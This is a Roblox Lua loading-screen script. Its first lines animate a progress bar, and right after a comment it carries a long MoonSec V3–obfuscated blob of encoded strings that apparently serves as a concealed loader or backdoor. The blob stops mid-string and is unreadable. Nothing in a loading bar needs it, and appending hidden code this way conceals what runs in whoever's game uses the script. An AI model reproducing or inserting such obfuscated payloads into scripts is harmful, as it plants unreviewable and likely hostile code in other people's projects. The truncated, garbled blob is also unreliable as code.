local bar = script.Parent:WaitForChild("ProgressBar")
local loadingGui = script.Parent.Parent

local totalTime = 120 -- 2 minutes
local steps = 100
local interval = totalTime / steps

for i = 1, steps do
    bar.Size = UDim2.new(i / steps * 0.8, 0, 0, 10)
    wait(interval)
end

loadingGui:Destroy() -- 
([[This file was protected with MoonSec V3]]):gsub('.+', (function(a) _QhbWEFLzjIsI = a; end)); DXQJehbzdtqHTbLe=_ENV;jiclkEdYLahFDdP='L!Vz6P=lage%}^Qss!eQaPP}z6meQ!%aas==!^azV%}VeVl/6l!QszeQaIP%zzda^=%VaVa6=BzV#gQWV%Qs}lealaQe}=ga=s6=!%}ggel^6}PEV^sQ^Pe}s=}Qezl!6^!^a^=^z%!VQg%QPe6s!as}}sggl}6%6s6Bs^^6e%a:!6(^Q6%el=Psz6{l^V}egs=^6g!gs}eaeulV6gV!N!e%%Pa}=!PgVsU=^^%6a%=VzgPrQlQ=gP=}6z!a%zgQl=Pl^%sa^Ve}l}YQz}s^Q==eg!=ezQ!eQV%lgs=lz^^UsQ}legl6Uzxl,p^le^=gPVVl%%}al}%Va^=#zl2Q6aV6s6^}6!!sQs}=g^^e%eg6PQz!ceQ=PPz68z^e%!a=!P!aQs}Vl0=P6%6#!%QQ}Pg}^P}zgPP^}se}l^P6V%R)%lgcPQze!l.}P^%eg!=az^Q}}se=lgPzs!%^g6ewl}P^V6YlQ!ee6%Plze_sea%!gl=l?6VzQa%}ggll6QV!Hugz=}6PVCs!}se=lPPVV=s%^a%!a=P=VsEeQz%ag!Psl=6zVPqV}lel=ePQW%cs%!g%P6=/!!&s}sgQaQPPz^^e}zg}=!lg6a!a}}%VlVll6^V=sa}sgclzz=!zQQ}sg}g6=ezs!^Qz}Q=6l}V6VVsPg=asl}PeQsQ6eQe^agVaz%!=}les%Pg6=zze!!Q=a6=gz^!esa}seVer%^6QVPs}^!aX=zzeE^QlaPP!Vazl!3sV}!a^=P1a!6sl}}=Pa!P=!}Se^}ezagPlzP!tQ=%^PT=}6!ulsP}laQl66VVws%^!eaz%!>QgTz}g%=6PPeVP:6QGlaal=gz^!}eg%6Pl=azgV!Qe}VeVg^a66%VVsg}Qlez!z^#z%V%%=g6PzgQ%Qa}el%6azQ6KVPQQ}Pg}l!!lQ;}Qgs=%z*SaQPQe%!=l=a!PzP!{Qz%eg!^}%aa=PV}Pg%lV6gV_sl}QePl}PzzPM!^aesa6zl!!^e%6gelV6l!Ps!}!}zg^l!6a!s=g6V;=l%P^Vg?F^le}==V%k^^g}PalP})e^^%eQ%^!ggl36laPz^!Q!%Qlgag66QVyVO}P}6e}6Q6P%aaQ=Pz}!zQe}!aaeQ6a!^s6}%eVlgP#VlsQ^Pe}azP%zz7a^s%=a^asz%!VQg}pgl=Q6P!}!g}ee!laP0V=s^^6%VaVPgz,xa^Q%Pa}=zze!!^asQg==^66!%sV}eeRll6QVPs}^zee}!Paz6m=^^%6ss}zg%l}6}%sgP=}6z!es!}a/s%=6^VPs%^VeglQPlz6MP^}%zs^^PeelaP6V6gP=%6V!gs+}lgQlP6}Vzse^!eeaPP=V^C6^%^}ag=VzljQQP%}gz=ePl!asV}=gQl66%VVsg^QelaVPPV^Gz^e%!aa=%z=!_Q6%^gV=%67!lo=}PgQlz6eV!s%}se=gPP6V%7V^e%JalPQz=6!Qz%eg!=aa!!=QQ}6g%lV6gVDslseePlQPzVeR!^aesa=llz6U}QV%%gt=gzQz%VV}zg%l!6Q!ssl}^eal%P==a>D^leQa%P}z6EeQPslas==z^V!Q%}zgglCag!Qs=}}e6leP!VassCVe^a=P%zVRgQ+%lg6=ez}!=Qe}!gal(6=!ss6}%%llgP9VlsQ^Pe}azPe=^ja^s%=as=6z%!VQgs^gl=s6P!ssz}%e!l}aQV=s^^6^QaVPezBklV(%Pa^=zze!!Qa%sg=gg66!^sV}geull6QVP!=^ze%a!PeVs:a^^^e}!=Vze!Sse%Qg==}6e!esPJlgsl=6^zls%^zega6g=VQ5P^}Q=ae=VzaGs5V%^gP=%6V!gs>}le}}P6}V6se86eaa3P=VQR6^ss!ag=mzl6!QP%^gz=eaz!as<}=eIl66%VVsg^%ela1PPV}Mz^e%!gelzz=!IQ6%}gV=g6GVg5%}Pemlz6%V!sa}se=gPP6V}<V^^%cagPQP%VaQz%%g!a=zs!lQ^}eg%l=aaVnsl}Q}zl}P6VeIP!lesa=P^=lZ%Qz%geVllzQ!=Q}}Pgel!6az!&=}^e=l%PPVg,2^leQe!P}z=>eQ!%aas==6sV6Q%}=ggl!6l!QsP^Z%VlePzVaz!^=eQa6P%PQngQ=%las=Pz}!zQe^agal=6=V!s6}%eVlg=gVlF=^P%dazPez!1aQ=%=g==6zQ!VQg}#gllj6PV=sz}ee!la6sV=YQ^6%=aVPQz Kl^Q%Pg*=z6=!!Q^%sg==^66z!sV^Vemaz6QVls}^z%}a!=kVs(Q^^%^a%=VPg!Js %Qge=}6z!es!^agslQ6^V}s%^%egejPeVQ+^^}%%ae==za,sse%^g%=%6g!gsa}lgQae6}V6se^leaa=P=z!zV^%%6agazzl_sQP%}^e=e6V!as!}=g^l66%=gsg^7elaSPPV}Nz^e^laaPsz=DQQ6%%gV=gal!lQQ}PeQ%Q6eV!saQae=l^P6z!-e^g%#ala^zP*^Qz%eg!=}lQ!=Q^}6}elV6eVHslQ%ePl}PzVe8!^aesa==Qz6#}QV%ggh=lzQ!PsQ}zgel!6a!ssl}^}6}gPVVgA3^leQgsP}6PzVQ!%gasl%z^!6Q%^6gsl 6g!QTQ}}ezlePlV^ss^ge^a6P%zzXgQ!%laQlez}!zQe}Vga=s6=!^6!}%e6lgPVVlss^P%QgzPezz*asz%=a^=66^!}Qg}zgllz6P!}szQeeQlaPVV=5#^6}VaV=%6=SlQV%Pas=zze!!?a}Vg=l!66!ssV^6epagP}VPI!^zesa!PaVsV=V%%6g2=VzQ!us!%Qelg%6zV0s!}^gsl=6^66Z6^VesaJP^VQ!V^}%ze_=!zsOsQ=%^g6=%P6Vlsv}sgQae6}VzseQz%alsPsV^1P^%%VaglV6Q QQs%}e^=e6!!asz^gg^l}6%6Vsg^!ellQa!V}hs^e%=aaPsz=)^2l%%gs=g6%!lQQ}Pg}aP6eV^sa^!e=lsP6V%!l^g%lal=gzP!aQz%ee}=a6=!=sg}6e=lV6^6Qsl^=ePg=PzV%B!^aQ^a==Pz6!zQV%gg;=^6z!Ps6}zg%l!6g!ss}}^e6gTPVVgq1^geQaPP}zz!sQ!%aas=ez^!6Q%}VeQlM6l!Qs^}}ezleP!z^ss^=e^alP%zVvgQ7}}aQ=Pz}!eQe}!ga=sP%!^s6}%ezlgPoVlsQoPe}a}Pezgca^s%=a^lVz%!}Qg}jgl=Q6P!}c=}eeelaP!V=ss^6e%a6Pgz#qlQl%Pa}=zzeVeQa%sg==s66!%sV}g%Vll6QVPs}^zeea!P}zgu=^^%6^!=Vze!{sg}}gP=}6zV}s!}agsg=lsV6s%^Vegaxl!VQ!lQs%zae=!ze sQ=%^e==Q6V!gs-^ggQlP6}6z8^^!ealsP=V^X}^%}6gl=mzl-Qsz%}gz=e6!!eQs}=g^lP6%VVsgQV%plQPPV}de^e%!aal!66M^Q6%%eP=g6F!l!6s%g}lz6eP}sa^Ke=a=P6Vs6!^g%jalggzPA^Qz%e%l=azs!=QQ}6g%lVP%z?sl}QePg6PzVer!Qe}Va=P^z6!!QV%ggWlg6}!PQ}}zegl!6a!s:aQ6e6l%PVzg{D^leQgl=ezz?eQ!}Qas==z^V=sV}VgelF6%!QsP}}}za=P!Vgss^le^g1P%66!{QW%eaQl=z}!zQe}!Q%=s6l!^sl}%eVlgP(z%sQ^Pe}azPezz:a^s%sa^=6z%!zQg}!gl=Q=%!}sz}eeVla6sV=';jTAm_FUYaMXvBUGuK='mEh<&X_6U8BwgHDLhHHwBX_EE8H3&X<DYUwg_g<UDUB8_<HUHEXhoLgBUX<w<8L6B_XLhX8&8<hXEEgL6D<6LH_g_BLHD8B6X_yLHX&&&PHXgE6LhDD6BHEgh8BH88X62_wLUXL&LDUX6EhLHD86XHggHwXH&856w__L<XB&B&<6D6B&_&E6H_86U<&ELZB8_LHDD66EELDXHEUL<DL6wHhg<<wLwU6XDDDX8E&HWwwL<X<Dg666<_DH868_XggUHEXw&6wLU1&X<gDUB&_hE_Ug8XEDgHHF&Xqhg7_&_9hUH8XNXTgw8E8&(8gBU_<BLLBDwEhXD<8DXD>kLLgX<E<Bg&wbhUD88<8<h_ggg&&6l6ghU<hLD_wy_HhXDX8L&<&BMUw66k<_BXw<<Uh&8g8Ef6Pwg<&2<Uw<686gLZBB__h_H&B&XEX&gLUh_LDUL6B_XDhhULULhhgUgp&E:EI&6B<hh<BEXUEDhE8HX,ESg86vUhhDDBBUXgHhHw_&E<E_Uw6_<2BBB__DEL8_8_EEH6HB&LZDgBU&&XL&L6_whUD<gH&_&X(w66UlOBL__DhLH8H8_gEhdBUBX&zwwB6E<wLhw _Uh6gDHX8<&hLwgE<xhgg<BLh6Eg8h8_&Dgwg<<D &766w<XL6BHXLhLD8868BEXgwUghD<HDgB&_UHXHX_U:D#_U8&6&BwLUM<XD68D_&_6HD8wU&<Lw_wH6whBD<B8EUEUBw_EEgHXUH&XLjL&BghEhBD_B_ZHE&wDU<<_>Uw6_L<<BeB6XEE_g8_&EhEXU8<<<Hg_w66<hgHD8DXhDEg_UB<wwhwh6&<_D<BhXBgLgL&BEhE88<&EDgLwBB_hh_8<8<h_ggg&&&+X#U6D_gL8BXXghhhXB0U_EELL6&6w<8DUBE_6H_H__8EDH_8EX*(8BDwh_BHLDUB&_&gwHh6g&EL&g_6XhHLEXD_X:LH&U6hhH{H<&6LEL U&hBhwD6B60DnHUHUv&UL86T_BIwgL8hE6hEHL&U&6H8wDUh<<BBBB_ghDHwXEXED&UBUhZhg<g_<gLBDh_<EBDID<Xg&hLLwg<h<wgXwEh8DB8&8wX8NUgEU6L_L_U8<gLwwh6Eh_gDHhUBLL5Ug&U&DwLh8g_EE&D_8X&HEE6DUXhLL&B6&hL2L<_6EEEEHXU_LHLHgE6hD8D8BHXDHXHX86X8N_gX6HLhLh_H<X<gw__&KLEDgHUX&8w_w_&8DLD6_BhUhwBc_EEHgU6L&X&UwgBB_hL<86B8XXEEgLU<L8:hUw<B<Hwh6EX6HEgH8X&_wHwH<ULD3E6__kL(HU_gEwED8hXEMBgU_H_g<h8DB6<EEH8XX_taZs8<<8<Ew&6B<_DE8U_xE8Hg8&XhLXLgwB_8hhDUX6_XDBH_&D&<w8wH6XLhDB_XhwhDBBXDE8gw88&U&wghUh<XHLDD8HXXE8U_U_E8wLw6<ULULw6FhLD68U&LEXEUUg6g2Uwg_6_DhgHw8&XBg8g8XgEcgBUE&yLgBEBXXHHhHw86X6wDgX_L<&D6w8_UhMD&XEXUchg66BEXg<g_<BD&Dt66XwhXH8U8XX=Xg_U=LXD8_g_BhUH68xX_gXgXXUP_f86g<UDhD8B6X_.LHX&&&XGLg<6<<LDLw}_BH6HDXXX_ggg<X_<8wBwUhX<hDTBB__EDHX&h<DHhg_U<hwBgB&h6h<8g8WE<HEH&&6W<w_BH6Ehh88BwX6E<HEUXLwiBg<UEhgBhBE_6H<HB8U&6Apg_<X<DgUwhh8DgDL_hEDHEggU&,ExhUg&6D6Hg6^EUHBD(UL&6-w6U6X&^DDBX_BHBHB8D&Lg_gHUw<BL<w8hUhUwwBUhhEED<88&Xg<gh<8LgLL6hhDDE8g8BXU46g7U_LXLXUU6hD8DE_/XwE<UU8EEwH_6__wLgB6w&_<EwHL&g&gHLHE&_EDLU8g6<E&wHBB_KH<gw&B&Ea<gX6h<ED8XD_6LEBg&g&EH<6HUB<8LEwXhhhhwX8U_gD_U_6wVBw6wX66<8D_BXXHHhHw_Xh4g(wX&BLELDBH_Xh88_8X&6WgwLXB<DqUwg_g<UDUB8_<HUH8Xh&_gXg866&ELHwX_gH8HBX6hhHEgDU&&hwHwh<<h6B8B_EgE<H6UULLLLgEU<<RDLB6EghXBL_B)BLL8h<w&UL6BL6<DfD#6<XXi6gg6L&h-&g_6<<hDBXL_ULhBH&H&hHE6DUw<BLhw_h<h<w_8U&ByLgh6w&6wDg-<Bh8LwwEXHHwHBXEE&E6UB&_L8w&_LXDL6HgBCXEgUgLUH<gLXwwhB<<wHB6EDDED&X6EBg_gg_D<gD_UE_&HBHB8D&Lg_g_UB<wwhwh6_h68D8D_qhhgLUD&_wwww<_LDVX6LhHHUD68_&DEh6L6LEhwUw><iLEL&8gh_H_UHX<X_gDwB6XLHBXBg_BE8Hh8U?6}68B&wQ6g_6L<XHLD<8wEME8HX8XLgq<BH6hhXL6B_XDhhUL8_&ZVXwUX<AEx&6UhhhEwX8BX<EHgBU&&U-w6A_g<&DXXgXDE6DEUD&U9ggL<gLUgXBB_DEL8_8_XUEBg6<H<HH^6__DDDBLwhX6EX8&&wEEE&Uw6U<hDw_<_gL_DhXBEwgXggUB<8LhwUh6h6wB_8h_D68BXXLL3<ww<)<8LXwXEgh<gH8h&XE6g_6D&hBLw__uhXHU6<hEh&8U&h&LHX6X_BLHDA66X_D_BE_E&hHhUH&UhDwD68<<EBBB_Xh_*_8_X/E&LhUB&&h<w<_Hh8nL8LXBEULw8E&Bhgwg6_<6EUBL_X&8H88&&L<XggU&__Lww686h6DhB<U<E<gDUB_LLDDX6BXwDwB__X&6H68hXh<<g<6D<gELBL_8h8zw8wX_E;L6U6&ELLD<6_X8LEBgUBEBH&8<6_ADg6B6<6Lhw>8<h8Dhg&X&E?g8w2&9LBww8g<hDBgHXHEUH8w8Xy#UDBUE<_EwBw__hUr68_6HEhL<U<<DLHHL_LhBDBgwXwE_H&w6&6!EgEB<<<DDBUULELH8866w5HLEUE<gLwHH_HhUD8g8_EEwLB8e&Uhwgh68XgL<BLUHhhHLwDXX}8DLU_&4hVwX6<XEDE8wXg<Hggw<&Uh8w86&<<EXBX_#h:,E8E&grBDH6H<6L6H8_8h&HDgXXX/LgHwE&&h6wL68XUDUB&XD&&H&UL&L<Yg76B<_Egw<_6&HD<8H6DEXgBBL<LLww&8whwD_BEU6EgH_wU&L:8D8UE<<EBB88Ch&(_8_XEEELhUB&<h<ww6XX&D&8D_E&WH/UB&_hggEBh<BLXH<_<EDH8wL&LxBg&Bw&<LDHg6&hHZH8HXUEUL8U8&<1<DX6g<hE_B__EEHkh8U&D<<g<6H<BELBL_8h&}wB<XB<gHhUw_HLgD<66X8D8B&_&&XHH8_6_YDgUB6<6LEw&8<h<HH886LE&LXUX<LLLDE6EhgD_gHXHEUH6w8&8*<wLBX<XL!BD8EhEHg8g6HE<ggBD<DLUwg8BhBD_BEU_E_Hp8&6hIhwH6wXDLXBDULhXHLg;X65HLEUXhHPED_BBXwHhHh8_&6wDwDUh<<BBBB_ghDHwXEXED&UBUhT<g<g_<gLwwU_<EBD!D<XD&<LDUD<h<wgXwEh8DB8&B_XhoDggUqL_LLUU<6<BwK_Hh&gDgB8h&<wBwB<XLwLD6hhgDUBh_8EUEw8_&8;gBLBD6&D}D86<XLH68U&h&hHX6w6<L<wX66<hHD8XXLELHUUL&ULhL8w6__ELDXX&X<D6H<&w& w_wB6hDLD6_hhUhwBhXHEwehU<X<fC><6U<<DLHgXh_EEAgUUgL8L8Ug<hhBBw_w_DDhBXUHZwghUUUw*6wH6B_{HBDE8L&DV6gH<g<ggLU&<HL6w_6lE&EUH>&X&DGBgB<E<UDhB6XBhgHw8<X6g&gw6X<BDHUU<_<8BHX6X6Ewgg&<&<dXg66&<<Dw_(_lHwB<BBh&Hh6HUg<wL<w6h&h&w6XHXXHU8_88qDL8U<<_DHw<w_<EDgBEUwRXiggB68<hLU_6_6LBwZ_whXHD8H<L&<Lw6168<XLXXg_<sHHhUXX6n_wDUhDLL_Bc_XEUw<_E_&HUUhU EX*6wH66<8Dg8gXBhhB_Uw&LSf6666<8LwBUEDEDwEX6&LH%8*8<-6gUU&<9D6BHw=h_D<8BX&LLGU8h6DL_w6_E_Uh_HXUDX&g<g<X_(6ghUE<gDpD&8gEEEBH_8_LHz&BD6<h_LUB6XLh<8z86&Ez_w8X&lh-X68h<<hw_BL_gDXgBUD<Lw_w_6BhwBhBh__E6UDUDXh <6B6B<DDL____L88L86E6D-8w&LJhw8U<<DL_BlB3_&EXUgUUYBoLUE&D<BLUB6_Vh_8X8DhUhEHDX6<HREwLhUhUww_8_gHL8_XXXU7Ewg<E<CL__h_8h6H_ULXXg&gwX6&8wD8_6Dhwg_Bg&6LLHD&w&<ghUL6HhXDB8H<UhhBg8B&hzDwBXX<Ug8BD6hh<8BBEXLaDg6UHLgLHg66whwL6B6_UhhUL8H-HVXU&UU<_?#wg6&hw8UBE&8VDgEXB<L3<w&hw<hL08LXUEDUH86hag_wLU8<HDHw8_8hBD&X8XwH<gU&_&&7hwE_B<28LBghEEgBUX_X8ggUU<DLH)r6&hDH8D78D&H _gg<w&&gDg6Uh<LB8w<6IHBD&BEXgJ_g&6<hgLh_E_#L&8LXH_%H<UL<8&9LDBH__hg8w8whDHgHLXh,DwUwL6HhgDXBwEBE_BH8B/_EUg&U1<DLh_U66<RDD88-LqDH&&,&8LEUEU&L6wX8BX<h68g6<<ULU8D__h6Hzwvh8hhB<86E8HAg88<&6L6g<6<<&DD_<ELE_B888dH+h6UUX<<LHw86EhU8X8XEUH_H8&guUwhwh6_h6B6_EEHHUg6_h+UTEgw6LhLLwBw_gh_8wX6&HDEg<&X!XeU6w<6DEDD8g__hhHB8ELDLH6&6&<UD8_8h<HLHB8hI6Q_8BXXLwwDgE<&hXB<B8XUENH&&E&fH&6&hL<&gp_D6ED&8LXBIX#hgH6w<hL6_6_6hwHgX<X<E6gU<L&_)&w<_g<hBEB+<&HXH<&UXB9_ghU,<&BBBB<gELBE_E_&H68<<H<gYh_D66ELBLwhhXDhgUUE&HL88&U_LwHh86X6LHgXU_hL?LUUUE7hL_6UhLhULhB_X_hhHh8<&Hgh6D6XKULU_g_EH6D&8hXgEUHsU6L&L&66<X<UBw_6EEEEHXU_P_gv6g<6<XgEBwhXDXDUXwE6gEgX6HLhL8_H<<<_B8__hgD68X8UKwg_6EU=hLD6BwEUELBwX8XggLUB<X&&w88E_D<_D&B&&<L&w_&_&6DL6LUhLXwE8UhhH8HL&LuBgXU*UEh8w8wghLDHHhUwX8%E8E8&!6g&BB_<L<L__8h&Ngg68&XhwwU_U8Lgw6_wh6DUDwXLE8gHUB&h&<Dw6w6DLEBL8&&HEwg<X<X_g8U__ghXwXwUhwD6gDU8X_E&6H&U&wwD68hHDBHwXDEXHwHDXhSgg66w<_LEwD8L<_h<8BUwhM%Xg86BLELEwX__HHDB8U_hEDH_UHLBk86D6&E8LEU&XHE_gg6<Swvgw&&&&6wB6_XHD&Hw8LXFHk8H6Dc3Rh6_<HL5BEUDX8h)gg_gXwg8H?&_kwD6_<hHLwg_B__EL6H6<w&_gLwg<&<hD688<89L8__B<DCBU&X_EHL_U<&h<EH<XBE65hUH8<&w1BBD6L<6gHBH<<h<8wU_<DLgUh& LHDUUX<U*6BD_8EXEwBD6Uh&HL8B&XDHgwBw&DDgg_&NE8DUwhUX<6BLw&<_EhBgBhhhgg8g<LODg8U&6wLBB_8EEBH6g6Xg<UL<g__wE6DEXwh<D^88BnXgHLUgUBChDUwH_<LU8UB8XwH<gx8_E8wLBDhDhhgw66XXE.HB8gX#gLg_&.<gCEUUEH<hH&8D_CE&8H_:E<H_gh_6<wDFBDhELL86XhXXE<gw6L&ED88hXBh_Hh6ghXEhH6U<<6LhBUX_EDwAXXX&E<B&&DEBLUUE6HDUDhXDXUD<wE&B<6LhBHXUh<ww6w&&Eg8UBgEHhh8EULX&(gU&&HLBwX6qh&DE8B__h8HhHh<&<PgU86XLELHX_X&wHwHh_L&UHXgUUh<DgXw&X8L_Dh_gXwg8g6UgrB?hU86UEHwB6EE6a8HB6BEgwDg<66E&L&8ghhEhBLUUXUpB86Us3UDB_D_5L8wU8H&gD8gD6B<XL<_BX6Dl8wUUX?LDDN6&&HLggB_jLUDUw8<g?6gh_8hUL<8D&_&8LH6g_hLhw6X&<XO8Hg6LEHLXUL_w%HDEULh6h<8HUU+&DX6B6_!DwBBX&6LBBw6U<LDD8h86X<=HU<<6<gBH8BXXD.DXX&hyHw8_<<&6DH6U_<D6wwXH_X1BUDU=<UHUg6_8,EHL8U<BLE86U8&ELBw6&LhHL6UU&<LDwEBU&HL_gLXg&gw8U8X&DEBB8UX_EEHU81<LLHg&U8VHw8BE<DLxBL8Q<8vEBL66L<H)BU&_<8wgBL&hLEHH8whDHXB&6E<Lw6_HE8q_HL6gh6E8wBULiLDwUH_E<6w_BBhgDLBhU7LBwXBL6whXwX8wXUHhw<U6XBHh86&UEXDw86_EDBB<BwE8DXUL_<Xhghg6&w<HL8_Dh8h8D&XBWDE_w_Ug LwXwg<UD_H689&wELgE6L&_wD8h&B.U8H_XX6hUBLUX&fDZgL6EEHDB6X<Dh6BE6LXLShHX8<&6wgwB_&h&HLBHEDEzDEU_X6TLgBUXLUD<BLX8E88LUBEXD6Uw6wVEH<_U_hy,L<_<hHLgHX_h<Bw_gU&D<6g&BHEUE68wX_EEE8UDUgN&wL6B<XLZLyBw<LD_U<XhL8gUg8<DDXw&68XXDbB}UwE_DLgU6h<D{hwD_<<&H8BB&XH<w<8Xh8wLg&&Dhhg&_H_DoD86X&h_E&gH<D&<DUwh_EEgwX8h%8EDgN6w<8H_U8_6E<HH8UX_L<gg8g<LD&U<6LL8D88h<8AUB76D_EL&gHXB?6wgUwh8<_HD8__XD8BU_<X<g_UEU&uBDh6hh_DUwXU8h6LL8H6X&wDw6&&&N<8U6XVDhhg<6DEggh8h_LLXBEXghwLUwL_D}<E668UH&8{<Uw68LHHX_X&wZ_HwUHE_kgUg&wLUgE_D_DE&gBUBXBDhHE6<&&D866&&EUBEBU&wEgUH_H<6Lq68&Lh<L_whhYF=8_6_X8D_86<ELBwL6Xhhh6HD_!bw-hgh8h<XHXwB<&hEDwBRhLD8gw88h<L6wh_H&hg_B7h8i68L6HXHHX8D<6&8wGUB6HDHL<6_h<H88h_h&wML6DUXzHgZULX6HgBgX_hh0aU8UL1DwB__<yLBB&Xh<HgUH<Xg&ggUg__wE6DEXwh<HE88_X1LDEw666&6w_6E_LD6H8_&EBhOHw8_L6>gBD&XhhDXwhXXE{gw8LXQEhU<UwhHwwUU<L<hB6ULX_vXH__={HH_UH&UDDwD8UXUEEHL_EXXgHwU&Hh<D8wvhUEBg<8!&wS_6H&U&g:X8w_<hLH888EL^B8XXW=wg&6hU&DUw6_Hh_v_8DX8<wgL88&X&BgDUHhh<&wB8&EwH_8EU3EUQ8U&XHLBBD6Bh&EEHE&UE5wDBw&ULgBB8&XL)HDLBw&HE6Hh8&XhWBgU&6<DwEw&<6HH8LX< &H1Hn<LLBgDBh6UEHBE_<_EL6H6XH&_wDwg_U<hHDBUXgEh8H8&EHeBw_6ELBD66K_g<9H_Xg&g>6wL6U!<LL68XwEhw8UUEELD8&_&4guLw6_aCwH__D6EE8ghBXhUHMBDU*qEz&6g_hLhLhX&h<gBBw6LoLHUgU<whBBhBHEUE68HXH4&H<w8&&hLLwguhD<_HU___6hEU<86X<L<g8hB<LB 8L<&DXgwBE&EHB8_&6=hwHw&_LhBH86_1wDgB<_hEXL<6g_8LhBw_UhEHgw9U_XBE&U<6h&_H8wh6&E8BhU-E_L_g<<Hh6qBBL6_LXHH__<UhRg8U6<LLBwX_DhDLX_qXBH_Dw6D&ULg6H6gh<LhBBX<L<gg66_6EwHHXLhDHHU_XLLggEXDhHD<H<X8hwgLBE<_<}gDBwhh:LwB_FJDh<8EULX&H6U&&Hl&Lw_w6uL?HE&U&&HhUU<&LgwD_XXLEgH6XD&H1wULUHE_g6g6&UYhHDw<EXhB8BX<TEEXU_UwE<wBBh&X<hHX8L&w+8H{_Hj<H<68_w#UgL6D&XhUg<8&LLrBw8UBLggU_D<Dh6D86LXLH6gL_w<XgH6h_8h&LhX6_wEa8&XwPBHHgg_HL_D<BLh8hg8LUBhUD<BDUDh&LH8B&EDHLhU_EDH8g8&L<LkLULhDLdBw6UX8HwHHXEEBgw6g<_3UHXBLXLEwgL6BX<DwwH_DG8DBgEXXEMHBU_X2)8B&U_EhLgw_6EhHD6Bh_UchBXBh<X{ggBUXhELE86XhLwHUBw<gD6H<86&8D_BE_6hBL86hhH)UH8_<<EL&HE6ESXD_6w_XLEH__6X;L#wD6HX_D8w8XLJhDw80_EELw&_&&EDgB6UEEHg_BLXghXg&6HX8L<w7_8h_L_Bg_ghhDhUEX6h_w88;&DHU8<__<BDh66_UDHHD6H<8L<wD_8h&gHw8&<E3Bw8w<B%UwU6<XXL&B&_D&EL<w6&BRwDUUE&wAEBH&HEwDH88X8EBBL88&X5Ug8U&<LD_wE6EEWLE8HX;ELD_68&8-wwU_<<gH8wX_HDHgXUhXhLDgEUH<DHHw<_AEXDXUw_Dh*gg66hwL8BB_LEDLUw<<HRwgX8gh8Lg8E6UEXLt8D_&EXHDUB<hh6B>6_hgE<gX&6hhHH8U<<L_DwXg<LL&8X8<<XDD8&6hhXwh8w<wL_wU_g<&Dhg<XU&hgDBL&&D8HXUhX<7_Bw__<UL<B66gEHwU88<8NLw66E<gNLwJUX<DD68B_ULhHD88X&GggB6whEgh86_6LwL)_DX<D6g868hUD_BgX&bEDHUX&HPUB<U_<LDLHEUt>XD%BE<DEwDh8EXUy6g6UhEBL6g_XLhUHLU<XXLDgw6_hBLgg<_U<8DU8EXBhXH8UHX8x8wg68<wDLBg6_<EDh8g_hLgDE8L<wDww86gEwH68EXgx6DB6Hh_L88&_8<8gHw_&<h&ggU6&h7hwU6DhDDUB&Xg&EHh83&hhHggUE&wL6wU&Hh<DwUX_UL&BL88&XE_wwU&h&D68B_hEGHDB8_6#EwgU6hhDUgE6BhED886&LEgHwBE&UEEw&6&<6Dgw&&+h8Hg8LhgEXBh8_<UHwBD_<EgDhUH6h(BLU__h8D&wh8H<6LDBH_ghwHDUB&Xf*g_6_&gDgHhU8cBLL86X8h6H<8B&8}#BU6_<XLXBEX&E6HhUy_EL_8E8hE&-Uw8XUhBgD8D_64&HHUBX<^5Bw8XhEL<B66gEHHL8B<8t8w&8z&i:_8!UX<DHL6&XHh<wL6wX&H.BwUXfLDh86_sLwH_U&XHh&BH86hU HBg_6hBHhUg&UEDwwXD<ELDwX6yVXDQBE_gLEH&8_&ULHgD6<&&D8w<_8EXHL6{&<EXw&6&<LLhwX_-E_L6BEXghXHhUHhhE8B8&<NXgQUH6&EMHXw___LwHw68hLE<8g6L&wHEBg<Lh<DHBEXEEHgHUD&UwHwX<&hwB8_&h&h_8w6&<X7UB8UBhULLBLhwD<HgB_XB{BH_U_&6/E6_<h<2DD8HX_EgUw8h:HME8&U_LwDEU8&6xEHwB<&DE8UgULS&D&BD_gpgL6UL<&EHB&&g&XfLg<6<<LDLw(_BHLH6X8X_gLgB&h<8w6BLhHhDB68wEHEB8VU<&wLg6<6gLELv_w__DEHgX&Eh:_U&UXLDL86&_LD6BX88E6EU8EUXz6Lw6B_H<XD_XHXHHwHgXXXhgwg_<X<EL8BBhEhEB/XwXhE_g6&65ELBg&6UhUL&B&_XEL8&UU+DbwU&66L6LhBBELh_w<B&E8EBBhXHh<Dgg_XD<h8DBHXgE&HU&XXh;bgBU_<DLX_h_EHUHU8g&Hg&gwX6&EwwwL<&E&HD8g<gh6wL_&&Hw8w8&gLhDB_B_LD&HU8h<UE_w6_DhZDX6hh8<<BU8&XwL_BLUDX<LUBEhH<ED8__XDH8D<XUX&L8H&_L&6H_w_6BD_w_6r_hH6wE_EX^LLBU68EXD&Xg_wEBHh8_l<><8_<g<&wXw8hD<Xgh6&XLJ8gw8EXewg6<6HLhHE6D&ELHwUUw&<DD66U&<hLgwU6-h68&8HEhE<UU6L;hLX6U6XDwB888EwEg8XUXLLLwg<6&DwL&_H_PDy8D8wERT6UBU6+yL,_B__hDHLX_XhHX83U6&8iwwUhD<wD8w<_Lh6HD&w&6gEgEUX<_BHwB_U<hDDB_XHgBg8&C&-z&wX<UhHL6BwXwh6H68UXhg6gU&E<Ew6BBhBhXHHXhX8D_H6&ghBHg8EX6<wgg8B_6HEDYUL&6Aw6UUX<<LHw86EhU8X8DTwCwgLUGL6LDUB6&DDLh_6&6EEgL_LXBLh86UiDgDg6LhXEHBsBhE6EwB6ULE6DE8XXhh6BXXg__HwBB6H&&DHBwX<EBgH_C_&Eg888E(gE_Uw87E8LwwgXEhkghUhE8D6HB&Lh8Lg8&XhRBHw8L__H&D<8h&BfD6wUU<_W!wg6&hw8U8&E_E6UgUHLBL_wD_LD_DX_U_XHDHEXE&&3gwH<&<HwhB8hgh8Bh8X%g2UHqUELUL&66<XhUB68wEXEEH8UBoE+BU<UkL8Dg_gXLh6HU&LXUgHgE&6&&wHwB<+DDDE_A_EHBgB&&&u>Uw8<ihLwhBhhXDtH688Xw-U6DUw<82<wL66hD8w8BEEEEHXU_LHPBwUUh<DL_BHEBh<8+8qX&4XUU6H&6LwBw66h6DUBhE6eD8EUDO6L66B6XhHBhB8<_h68g_D<glgwL_E&UDFw&hE<sHL86XwgUHXU<&Hz8gE6UDXD&XwXwELH)&6&DHBg&<D&hw686_EELwLBB&hD6Hu<g<ggL6X_HDDLh_6&tEQg<6BX#DhwUUhLXBgw_hwE6wHUh<g0gg_XLE8wyw&_gD8DEXg__HwgE6U&BLUg_X8EwD&_8<6hB8L6g&_EwgH_w<gL&UHh&<<Dh8BXDgwgwXDd&Lg6LUEL_g8BgXhL_H&8<<gLUU&<w&XwB8U&wh<HB6DXQ#LBH<L&gLBg&Uk<UDLXgXUHBHwXy&&wDwBUh<<BBB8hgEgBh8LEXH<g_&X<gw<BL66hU8LBUhEE&868&OB